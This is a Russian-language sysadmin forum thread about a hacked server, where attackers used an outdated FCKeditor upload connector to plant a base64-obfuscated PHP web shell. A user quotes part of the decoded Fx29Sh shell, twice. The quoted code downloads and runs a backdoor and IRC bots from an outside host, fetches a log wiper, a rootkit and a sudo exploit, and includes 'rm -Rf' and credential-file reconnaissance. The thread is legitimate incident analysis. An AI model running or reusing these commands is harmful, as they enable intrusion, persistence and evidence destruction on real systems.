Модератор: terminus
Laa писал(а):По pid можно найти сам файл через fstat.
сенкс, буду знатьпроще хостинг пристрелитьLaa писал(а):Заставь юзеров удалить установленные phpmyadmin и тому подобный софт, который доступен всем рыскающим хакерам для попыток взлома.
там этого "добра" пруд пруди. Надоело видать с кроном спорить.
сам пхп-скрипт после раскрытия из base64 лез http://uaedesign.com/xml/ за доп архивами, который он собирался распаковать, я их позже не смог скачать (вроде там для моего ИП был уже запрет).Код: Выделить всё
#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08 ##
define('sh_ver',""); ##
## By FaTaLisTiCz_Fx ##
## б? 03-09 2008 FeeLCoMz Community ##
## Written under PHP 5.2.5 ##
#######################################
$sh_name = sh_name(); ##
#######################################
#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."cyberz.txt","fx29sh.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
...
...
$cmdaliases2 = array(
array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"),
array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"),
array("-----",""),
array("Logged in users","w"),
array("Last to connect","lastlog"),
array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
array("CPU Info","cat /proc/version /proc/cpuinfo"),
array("Is gcc installed ?","locate gcc"),
array("Format box (DANGEROUS)","rm -Rf"),
array("-----",""),
array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
array("Run WIPELOGS PT3","./zap2"),
array("-----",""),
array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
Laa писал(а):Разгреб -- оказалось проломили какой-то fckеditor
знаем, ломали. Там фишка в том, что есть коннектор, который может файлы принимать на сервер. Вот просто и передают файл, фсикей его принимает и сохраняет по известному пути, собственно и всё. Защита только одна - авторизация апача на всю админку.
Детсад. safe_mode=ON (Что в принципе Zingel и ранее сказал)Laa писал(а):Сам недавно подобные сопли [классический секс].
Разгреб -- оказалось проломили какой-то fckеditor, типа какой-то веб-редактор для чего-то, я не вникал, его еще предыдущие разработчики оставили, да еще и древнюю версию. Хакеры его ломанули и через него влили пару своих скриптов, потом бэкдур. Свои скрипты они попрятали в images/ где куча картинок на несколько экранов, но я это обнаружил в логах, так что им не удалось увести с глаз скрипт. пхп программулина их была вся закодирована в base64, ее код сразу и не виден и не бросается в глаза, просто base64-символы и в конце раскрытые через base64_decode.
Бэкдур планировался rathole-1.2.tar.gz, я его так и не нашел.
Часть кода этого пхп-файла:Код: Выделить всё
####################################### ## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08 ## define('sh_ver',""); ## ## By FaTaLisTiCz_Fx ## ## б? 03-09 2008 FeeLCoMz Community ## ## Written under PHP 5.2.5 ## ####################################### $sh_name = sh_name(); ## ####################################### #$sh_mainurl = "http://localhost/FX29SH/"; $sh_mainurl = "http://uaedesign.com/xml/"; $fx29sh_updateurl = $sh_mainurl."fx29sh_update.php"; $fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt"; $sh_sourcez = array( "Fx29Sh" => array($sh_mainurl."cyberz.txt","fx29sh.php"), "psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"), "Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"), "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"), ); ... ... $cmdaliases2 = array( array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"), array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"), array("-----",""), array("Logged in users","w"), array("Last to connect","lastlog"), array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), array("CPU Info","cat /proc/version /proc/cpuinfo"), array("Is gcc installed ?","locate gcc"), array("Format box (DANGEROUS)","rm -Rf"), array("-----",""), array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"), array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"), array("Run WIPELOGS PT3","./zap2"), array("-----",""), array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"), array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"), array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
сервак пашетreLax писал(а):Успехи есть ?
спама нет, дырку так и не нашёл, но заплатка всё ещё стоит в кроне, поэтому уже забил 
ну раз лень - засунь их всех в клетки и разреши 80 порт входящий с родительской системы (и если нужно FTP) и max-conn-rate исходящих в случае если из тебя ботнет сделали )) И хрен с ними, тогда уже точно можешь забитьzg писал(а):сервак пашетreLax писал(а):Успехи есть ?